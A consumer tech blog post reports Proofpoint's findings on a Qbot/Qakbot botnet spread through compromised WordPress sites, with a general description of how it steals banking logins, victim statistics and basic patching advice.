500,000 PCs Infected with Qbot Malware to Steal Financial Data

Yikes, a botnet with over 500,000 computers?

That’s what Proofpoint security researchers uncovered after investigating a large number of WordPress websites that had been compromised to perform drive-by-download attacks on unsuspecting visitors.

Proofpoint researchers report that the Russian-speaking cybercrime group behind the attacks were able to setup the drive-by-downloads using purchased lists of website admin logins. The drive-by-download exploits used browser & browser plugin vulnerabilities (Java, Flash & PDF) to silently plant Qbot/Qakbot on the victim’s machine.

Qbot / Qakbot

Qbot, aka Qakbot, is a backdoor Trojan that will connect to a remote server, allowing attackers to take remote control of the infected system. It can download and install additional software and steal banking credentials using a technique called “browser hooking.”

Online banking sessions are secured via SSL/TLS encryption, but Qbot gets around that by hooking into the browser and reading the traffic after the browser decrypts it. The data is then relayed back to Qbot’s command and control server.

Qbot /Qakbot Victims

Qbot Botnet Geolocation / OS Share
Image Credit: Proofpoint

Researchers say over 800,000 online banking account logins have been stolen by this group, although it’s unclear how much money may have been siphoned out of victim accounts.

More than half of the computers infected are running Windows XP (52%), which didn’t surprise researchers since Microsoft stopped supporting the OS back in April of this year. Windows 7 powers the second largest share of infected systems at 39%, while Windows Vista makes up 7% and Windows 2003 Server 1%.

An overwhelming majority of the victims are located in the United States (75%).

Keeping Your PC Safe

To stay safe, Proofpoint recommends that users:

  • Keep their operating system and third-party sofware up-to-date and fully patched with the latest updates. (Psst.. that means upgrading from XP!)
  • Consider disabling or removing Java from your PC.
  • Disable JavaScript in your browser or maybe look into using a plugin like NoScript.

Additional information, including more details on how the drive-by-download attacks work, Qbot functionality and how to protect your WordPress website is available in Proofpoint’s report (registration required).

Like this post? Follow us online by liking us on Facebook, following us on Twitter (@thechipmerchant), or circling us on Google+.